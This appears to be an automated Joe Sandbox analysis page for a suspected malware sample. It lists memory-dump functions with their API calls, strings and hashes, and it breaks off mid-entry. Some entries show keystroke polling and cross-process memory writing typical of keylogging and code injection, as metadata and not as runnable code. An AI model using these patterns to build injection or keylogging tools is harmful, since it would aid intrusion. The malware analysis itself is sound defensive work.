Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 527ba08a1bebe329360d59c1b742a1e2ee66519bd15e60a2492d0680ab6266b6
Instruction ID: f0aea9baf35a2afd62dd1bd5e924970c2fc31850d355dbcedbc18022fce7bd23
Opcode Fuzzy Hash: 527ba08a1bebe329360d59c1b742a1e2ee66519bd15e60a2492d0680ab6266b6
Instruction Fuzzy Hash: 6C513D39A00509DFCB05EF64C981EAEBBF5EF09311B148095E909AB362CB31EE55DB54

Function 00C7A443 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32227cb63578a484e0fbaee74a5a3aff901401e8baf65861ef17c9c72aad9cf0
Instruction ID: f0aff2e5d4617ee075b92ffd9e19dd7611801731411d11db71ee9d10c72c2623
Opcode Fuzzy Hash: 32227cb63578a484e0fbaee74a5a3aff901401e8baf65861ef17c9c72aad9cf0
Instruction Fuzzy Hash: 2541C136900114AFC760DF68CC48FADBBA8FB89310F148155F92DA72E1D671AF40DB52

Function 00BF2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BF2727
ScreenToClient.USER32(00CB67B0,?), ref: 00BF2744
GetAsyncKeyState.USER32(?), ref: 00BF2769
GetAsyncKeyState.USER32(?), ref: 00BF2777

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 49114ea2948989b5dde34f0aed94b12e1f15662420f74c016c65497995e238e5
Instruction ID: b727cbb76d62b651e3cfc5d8d22a5798f7dc31129fc6ded9820990abcce91ced
Opcode Fuzzy Hash: 49114ea2948989b5dde34f0aed94b12e1f15662420f74c016c65497995e238e5
Instruction Fuzzy Hash: 54415E75504119FFDF159FA4C884AEDBBB4FB05320F20435AF92897290CB30AE64EB91

Function 014C00F0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014C0126
std::_Lockit::_Lockit.LIBCPMT ref: 014C0146
std::_Lockit::~_Lockit.LIBCPMT ref: 014C0166
std::_Facet_Register.LIBCPMT ref: 014C0201
std::_Lockit::~_Lockit.LIBCPMT ref: 014C0219

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 95e064a4d333a1547d11b23fcbef3dead2614dfc306e822f43c8448e500cd256
Instruction ID: f6e67d39b04a7dde2c88dcd366421accccbc3f31b8e6be4262c6366db2d35258
Opcode Fuzzy Hash: 95e064a4d333a1547d11b23fcbef3dead2614dfc306e822f43c8448e500cd256
Instruction Fuzzy Hash: E541CD79900215CFCB76DF99C480A6EB7B4FF54B10F15816EE806AB391CB71AA05CB81

Function 00C4C61A Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C4C62F
_memcmp.LIBCMT ref: 00C4C64D
_memcmp.LIBCMT ref: 00C4C660
_memcmp.LIBCMT ref: 00C4C678
_memcmp.LIBCMT ref: 00C4C690

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 2a874645088c6ecb5b7b76c70b040d8d6aec4c96a2b12d90d35b7ad1d59c9e8a
Instruction ID: 50e42a3f9e7f290b94f427989a8030896253f1eeb071187b00c94b082fcc1430
Opcode Fuzzy Hash: 2a874645088c6ecb5b7b76c70b040d8d6aec4c96a2b12d90d35b7ad1d59c9e8a
Instruction Fuzzy Hash: 4C01F1A2A071057BD20066129CC2FFBB71DAA92788B059022FE15D6262E625DF10A2A8

Function 00C48AAA Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C48AC1
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C48ACB
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C48ADA
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C48AE1
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C48AF7

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 80bcb9247fa1051621beb6aa308055793bea8d1e0f1a9cff4535b1e81edc5b9e
Instruction ID: 0488fb9693f0df25b34705f4b20dcc9bf0be97cbfb1a10de76e254483260b45d
Opcode Fuzzy Hash: 80bcb9247fa1051621beb6aa308055793bea8d1e0f1a9cff4535b1e81edc5b9e
Instruction Fuzzy Hash: 40F0A971200304AFEB900FA4AC8DF6F3BACFF8A769F200029F914C2160DB619C08DB64

Function 00C4CB5F Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C4CB73
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C4CB8A
MessageBeep.USER32(00000000), ref: 00C4CBA2
KillTimer.USER32(?,0000040A), ref: 00C4CBBE
EndDialog.USER32(?,00000001), ref: 00C4CBD8

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 2170a60b971eda0359e3d57579aac2fc3f70974e9a7e8b71245935a8743bbd48
Instruction ID: d9863ca49215584b8d17cc3866d4b6e946f198e88dde6c7688137ebbb17b153a
Opcode Fuzzy Hash: 2170a60b971eda0359e3d57579aac2fc3f70974e9a7e8b71245935a8743bbd48
Instruction Fuzzy Hash: A601D630441708ABEB605B10DD8FFAA7778FF00705F000659F993610E1DBF06A588F94

Function 00C5C847 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C5C8E2
CoCreateInstance.OLE32(00C83D3C,00000000,00000001,00C83BAC,?), ref: 00C5C8FA

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

CoUninitialize.OLE32 ref: 00C5CB67

Strings

.lnk, xrefs: 00C5C876, 00C5C89E, 00C5C8A8

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 087e5c981a5161000acf889e3cc4f5f97fa8f4c6265eebf4bf4f3396b80d5841
Instruction ID: 42eae954a63bd6f908ce0d88ecfe3b828399b3412cfa29c197e33a8df49d8006
Opcode Fuzzy Hash: 087e5c981a5161000acf889e3cc4f5f97fa8f4c6265eebf4bf4f3396b80d5841
Instruction Fuzzy Hash: 4BA12D71104205AFD300EF64C891EAFB7E8EF95718F04496CF65597292EB70EE49CB92

Function 00BFE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00C10F16: std::exception::exception.LIBCMT ref: 00C10F4C
Part of subcall function 00C10F16: __CxxThrowException@8.LIBCMT ref: 00C10F61

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C01680: _memmove.LIBCMT ref: 00C016DB

__swprintf.LIBCMT ref: 00BFE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BFE431

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 5b9b0334e4bd7b5426e52eb3e54ead836d963132a70489e340ae7006bcefef3f
Instruction ID: 0191d4d1f0c0274e43048392ad9b46c4973f1cd0f1fdf1ad44a69f53971262da
Opcode Fuzzy Hash: 5b9b0334e4bd7b5426e52eb3e54ead836d963132a70489e340ae7006bcefef3f
Instruction Fuzzy Hash: 53917C711182059FC714EF24C886CBEB7F4EF95704F04495EF9929B2A1EB20EE48DB92

Function 0140F7C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0140F9C1
___std_exception_destroy.LIBVCRUNTIME ref: 0140F9D0

Strings

at line , xrefs: 0140F85A
, column , xrefs: 0140F8BA

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 5a9cd84a85f2deae5f560dc517357b6753a95906a50e4bed9410cb886a83a108
Instruction ID: 7171b6020b43e9a80f569637cc15949c74bc7b26aa1e112481560bd58b2ad825
Opcode Fuzzy Hash: 5a9cd84a85f2deae5f560dc517357b6753a95906a50e4bed9410cb886a83a108
Instruction Fuzzy Hash: 35613671A00215AFDB19CF69C880BAEBBF5FF59300F14453EE401A73A0D774A945CBA0

Function 00C1057F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00C105BB
#, xrefs: 00C105C4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: ba63d72a7eba985daecb388f569d80568adf9ec2c51e8fb6f78ea41305c152df
Instruction ID: 54a355075d8aeccf0bc4efff0a4f5c2c3401f4f33f59fc8eaa75ad6e59aaeb62
Opcode Fuzzy Hash: ba63d72a7eba985daecb388f569d80568adf9ec2c51e8fb6f78ea41305c152df
Instruction Fuzzy Hash: 2D510DB1104216CFDF15DF28C8406FABBA4BF56310F284056FCA19B294DB709EA2DB62

Function 01475190 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0147522A

Strings

string or blob too big, xrefs: 01475286
%llu, xrefs: 014751DF
%llu, xrefs: 01475231

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: %llu$%llu$string or blob too big
API String ID: 3732870572-3890766324
Opcode ID: 504c1ff4f9be4d000f385bb5d4e9c9514e7ce726aea631578e0152b82c65e213
Instruction ID: 36e27f8e380ae3126b6f95aaa25be1b87cff7ac7d580e5c5d1c92909d9e18656
Opcode Fuzzy Hash: 504c1ff4f9be4d000f385bb5d4e9c9514e7ce726aea631578e0152b82c65e213
Instruction Fuzzy Hash: EC413871A002106FE7209B29CC40B977BA0EF95730F18479DF9A49F3E2E671A940CB91

Function 00C4A190 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C51B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49C31,?,?,00000034,00000800,?,00000034), ref: 00C51B51

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C4A1DA

Part of subcall function 00C51AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00C51B1C

Part of subcall function 00C51A49: GetWindowThreadProcessId.USER32(?,?), ref: 00C51A74
Part of subcall function 00C51A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C49BF5,00000034,?,?,00001004,00000000,00000000), ref: 00C51A84
Part of subcall function 00C51A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C49BF5,00000034,?,?,00001004,00000000,00000000), ref: 00C51A9A

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C4A247
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C4A294

Strings

@, xrefs: 00C4A2AC

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ebb2f07a9d09896b9cf5cba3c74ef333e2b1e1e1c14c04916db8fbb7839d8edb
Instruction ID: 4e91c60108af2606841677b2501a06500c8ca9e80467ef0da7cd8d10041a9c65
Opcode Fuzzy Hash: ebb2f07a9d09896b9cf5cba3c74ef333e2b1e1e1c14c04916db8fbb7839d8edb
Instruction Fuzzy Hash: 86416B76901218AFCB20DFA4CC85BDEBBB8EB09300F104095FE55B7181DA716E89EB61

Function 014DCB1E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 014DCB43
CatchIt.LIBVCRUNTIME ref: 014DCC29

Strings

MOC, xrefs: 014DCB55
RCC, xrefs: 014DCB5D

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 54a5f356a932f81bf7309febcedda4b70054330c8d8c4f297625cf12bc4a71b1
Instruction ID: b56b666c6a2b24c4ae6fd090019e9b1693ae2f9de312e4943ab8d41bf7faf1e6
Opcode Fuzzy Hash: 54a5f356a932f81bf7309febcedda4b70054330c8d8c4f297625cf12bc4a71b1
Instruction Fuzzy Hash: D0415872900209EFDF16CF98DD90AEEBBB5BF58314F18819EFA04A7221D335A950DB51

Function 014BA2C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 014BA35F

Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE

Strings

ios_base::failbit set, xrefs: 014BA205, 014BA301
ios_base::eofbit set, xrefs: 014BA306
ios_base::badbit set, xrefs: 014BA2F7, 014BA318, 014BA343

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 0ec6eaf3f90d4535de47e4a513305708a2b8c602d270ecd0cd4fe7ca9555b27c
Instruction ID: e3a8538377a8d95b0362a880411a604dd11ec74127a2cf53e03b5a9c4d53053b
Opcode Fuzzy Hash: 0ec6eaf3f90d4535de47e4a513305708a2b8c602d270ecd0cd4fe7ca9555b27c
Instruction Fuzzy Hash: 861106B29403156BC714DF69C846BD6B7E8FF25210F24892BE9549B650F772E940CBA0

Function 00C6C4A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C301AA,?), ref: 00C6C4AF
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C4C1

Strings

kernel32.dll, xrefs: 00C6C4AA
GetSystemWow64DirectoryW, xrefs: 00C6C4BB

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 5d45dcf25b49d4dbeb6048b8f4fe6436bd5088128826e354876aa99ea248f8f5
Instruction ID: 06753787dabeacc03e3290eaef7295c6c2c6cf1ef3e96155da81f7fc27a79ebc
Opcode Fuzzy Hash: 5d45dcf25b49d4dbeb6048b8f4fe6436bd5088128826e354876aa99ea248f8f5
Instruction Fuzzy Hash: 65E0C276500B138FEB309B25C898B7A76D4BF14769F508439E8EAC2620EB70E840C710

Function 00C04BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C04AF7,?), ref: 00C04BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C04BCA

Strings

kernel32.dll, xrefs: 00C04BB3
Wow64RevertWow64FsRedirection, xrefs: 00C04BC4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f948b882a1511d5d8190b5d9aa541d5317a5308d251e893975611e399b2c16f9
Instruction ID: ae8b12ad6fcbb5ab876f2d6318702ed462ee020992d6bc7738c3fe2d19770227
Opcode Fuzzy Hash: f948b882a1511d5d8190b5d9aa541d5317a5308d251e893975611e399b2c16f9
Instruction Fuzzy Hash: 7BD0C7B0800B128FDB20AF30D808B0B72E4AF00360F208CBAD8A2C2590EA70E980CB00

Function 014F6376 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(940E2C7A,00000000,00000000,00000000), ref: 014F63D9

Part of subcall function 014F188F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,014EFC41,?,00000000,-00000008), ref: 014F18F0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 014F662B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 014F6671
GetLastError.KERNEL32 ref: 014F6714

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 7c1491bb715a813e958375834c115bfebac30f22db6aee0dca4bc766a0315a4e
Instruction ID: 2684ba960767e6a110b705a9d8993356fcfb32cd74138c279bfd380b1306d2c3
Opcode Fuzzy Hash: 7c1491bb715a813e958375834c115bfebac30f22db6aee0dca4bc766a0315a4e
Instruction Fuzzy Hash: 85D17875D002499FDF15CFE8D8809AEBBF5FF09310F29452EE625AB361E630A946CB50

Function 00C6E4DB Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C6E56F
CharLowerBuffW.USER32(?,?), ref: 00C6E5B2

Part of subcall function 00C6DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6DC76

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C6E7B2
_memmove.LIBCMT ref: 00C6E7C5

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

